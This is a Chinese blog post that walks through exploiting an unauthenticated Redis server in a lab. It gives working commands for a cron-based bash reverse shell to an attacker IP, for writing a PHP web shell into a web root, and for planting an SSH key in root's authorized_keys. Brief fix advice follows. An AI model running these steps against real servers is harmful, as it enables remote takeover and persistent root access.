Redis未授权访问漏洞复现

最新推荐文章于 2024-06-15 19:00:08 发布
最新推荐文章于 2024-06-15 19:00:08 发布
阅读量3.9k 收藏 9
点赞数 1
分类专栏: 各种漏洞复现 文章标签: Redis 未授权访问 漏洞利用 修复建议 安全配置
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangbz123/article/details/113309414
版权

Redis介绍

redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步。

Redis 是一个高性能的key-value数据库。

漏洞简述

Redis中存在未授权访问漏洞,该漏洞源于程序在默认配置下会绑定在6379端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。当程序没有开启认证选项端口对外开放时,攻击者可借助目标服务器访问权限利用该漏洞未授权访问Redis并读取Redis的数据,在服务器上写入公钥,进而使用对应的私钥直接登录目标服务器。

安装Redis

下载redis安装包
下载地址

这里我是用的Redis 4.0.0

tar -zxvf redis-4.0.0.tar.gz #解压redis压缩包
cd redis-4.0.0 #切换到目录
make #编译安装
#安装过程中可能会报错
#安装gcc等插件,依据报错情况下载插件 yum install gcc/apt-get install gcc

在这里插入图片描述

cp redis.conf  ./scr/redis.conf #复制redis.conf文件到src
修改配置文件
vim redis.conf
#bind 127.0.0.1
bind 192.168.220.129 #redis服务器所在地址
protected-mode no #将yes改为no这里

启动redis服务

./redis-server ../src/redis.conf

在这里插入图片描述

任务计划反弹shell

攻击机监听端口
netcat -lvp 5555

在这里插入图片描述

攻击机连接redis服务器
redis-cli -h 192.168.220.129

在这里插入图片描述

将shell写入redis,设置以下参数。
set test "\n\n*/1 * * * * /bin/bash/-i&/dev/tcp/192.168.x.x/5555 0>&1\n\n" #设置计划任务为test,写入shell,一分钟后同5555端口反弹shell。
config set dir /var/spool/cron #设置计划任务的工作目录
config set dbfilename root #设置数据库名为root
save #保存

在这里插入图片描述
反弹shell
在这里插入图片描述

通过redis将webshell写入网站

设置参数

set w "<?php phpinfo(); ?>" #设置文件内容
config set dir /var/www/html/dvwa #写入目录
config set dbfilename p.php #写入文件名称
save

在这里插入图片描述
可以看到已经写入
在这里插入图片描述
在这里插入图片描述
上传马儿成功连接菜刀
在这里插入图片描述

利用公私钥获取root权限

在攻击机上生成公钥对

ssh-keygen -t rsa

在这里插入图片描述

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt #将公钥id_rsa.pub文件写入test.txt文件
cat test.txt #查看写入的test.txt文件。

在这里插入图片描述
将test.txt文件写入redis

cat test.txt | redis-cli -h 192.168.220.129 -x set crack

在这里插入图片描述
连接redis设置以下参数,将公钥写入到目录下的/root/.ssh/authorized_keys文件,直接免密连接目标主机。

redis-cli -h 192.168.220.129
config set dir /root/.ssh/ #设置工作目录为/root/.ssh/
config set dbfilename "authorized_keys" #设置db名字
config get dbfilename #查看db名字
config get dir #查看工作目录
save

在这里插入图片描述
在这里插入图片描述

ssh -i id_rsa root@192.168.220.129 -p 2223

在这里插入图片描述

修补建议

修改默认bind 127.0.0.1的地址,修改为仅允许访问的ip地址。
修改默认的6379端口。
配置认证,也就是AUTH,设置密码,密码会以明文方式保存在Redis配置文件中。

参考学习文章

https://www.cnblogs.com/bmjoker/p/9548962.html#gallery-24
https://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

bye_X
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Redis授权访问利用总结
2ed
10-09 1648
漏洞概述 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞...
攻防_漏洞_Redis授权
redglare的博客
01-11 1896
原文链接:http://www.cnblogs.com/bmjoker/p/9548962.html 一、漏洞简介以及危害: 1.什么是redis授权访问漏洞Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在
redis授权访问漏洞复现
qq_46343633的博客
01-19 1981
Redis 全称 Remote DictionaryServer(即远程字典服务),它是一个基于内存(当然也可以把其存储至硬盘上,这也是写shell的必要条件之一)实现的键值型非关系(NoSQL)数据库Redis 免费开源,其最新稳定版本是 6.2.x(2022/11/10)。常用版本包括3.0、4.0、5.0。自 Redis 诞生以来,它以其超高的性能、完美的文档和简洁易懂的源码广受好评,国内外很多大型互联网公司都在使用 Redis,比如腾讯、阿里、Twitter、Github 等等。
redis授权访问
最新发布
san3144393495的博客
06-15 1285
redis非关系型数据库
redis】验证redis是否正常运行以及报错解决方案
一起加油吧
04-11 2935
如果您在应用程序中使用 Redis 客户端库(如 Jedis、StackExchange.Redis 等),则可以编写一个简单的程序来测试 Redis 是否能够正常工作。” 错误,意味着客户端尝试向 Redis 服务器发送命令,但提供身份验证或提供的身份验证信息不正确。如果已经进行了身份验证,但仍然出现此错误,请检查是否已正确输入了密码,并且密码是否与 Redis 配置文件中设置的一致。如果上述步骤无法解决问题,则可能需要进一步检查 Redis 的配置、网络等方面的问题。Redis 出现 “
Redis授权访问漏洞的利用姿势
chengman3837的博客
12-30 366
本文来自:i春秋社区 0x01 Redis简介 redis是一个key-value型数据库,信息以键对应值的关系存储在内存中,当然可以把其存储至硬盘上。项目中使用redis做任务队列的存储器可以很容易实现分布式,另外也开始流行使用redis作为session的存储器来替换传统的文件方式。在...
redis授权访问漏洞复现
findou
04-09 429
Redis是一个开源的key-value内存中的数据结构存储系统,可以用作缓存,或数据库redis因为配置不当可以导致授权访问redis的默认端口是6379,并且redis默认配置没有密码认证,如果reids服务暴露在公网上会导致攻击者在授权的情况下访问redis。如果redis以root身份运行,攻击者可以给root账号写入ssh公钥文件,通过ssh登录目标主机。下面是redis授权访...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
redis 安全漏洞导致服务器被攻击
Golden_lion的博客
03-01 3888
近日发现redis数据无故被清,恢复后连续几次还是被清,由于经验不足,一直认为是自己配置有误。经过多天查找,才发现2015年11月份爆发了redis安全漏洞攻击事件,一一印证了下,全部中招。 特点: 1.redis缓存被清0;而且每天会执行一次; 2./root/.ssh/ 下多了几个文件。dump.rdb, foo.txt, authorized_keys里多了莫名
Redis授权访问漏洞复现与利用
bylfsj的博客
03-21 2314
一、漏洞简介以及危害: 1.什么是redis授权访问漏洞Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访...
Redis授权访问漏洞复现(三种方式)
weixin_55843787的博客
03-29 9430
redis授权访问漏洞
Redis授权访问利用合集
em.....
07-07 836
微信公众号:小惜渗透,欢迎大佬一起交流进步正常redis默认情况下,会绑定在0.0.0.0:6379,如果没有限制来源IP并且甚至没有密码,那么就会导致攻击者非法访问,并读取Redis的数据,还可以利用自身config命令进行写入操作,攻击者可将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys中,进而直接使用对应私钥登录目标服务器。搭建环境: 将这行绑定本地加上注释(还可以改成0.0.0.0)将保护模式关闭保存,然后启动redis服务 切记别忘了关防火墙在/roo
Redis授权漏洞复现
adorkablezhenbai的博客
05-09 202
redis上一次接触是写java项目中验证码环节用到过,最近看漏洞,发现如果在redis将端口暴露在外,能够造成授权连接,以及获取webshell,所以这里复现一下。
redis授权访问漏洞修复
11-03
为修复Redis授权访问漏洞,可以采取以下措施: ``` 代码块1: 1. 修改redis.conf配置文件,将bind 127.0.0.1改为bind 0.0.0.0,这样Redis只会监听本机的IP地址,而不是所有的IP地址。 2. 设置Redis密码,可以在redis.conf配置文件中设置requirepass参数,或者在Redis启动后使用config set命令设置。 3. 使用iptables等防火墙软件,限制Redis服务只能被信任的IP地址访问。 ``` 相关问题:
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值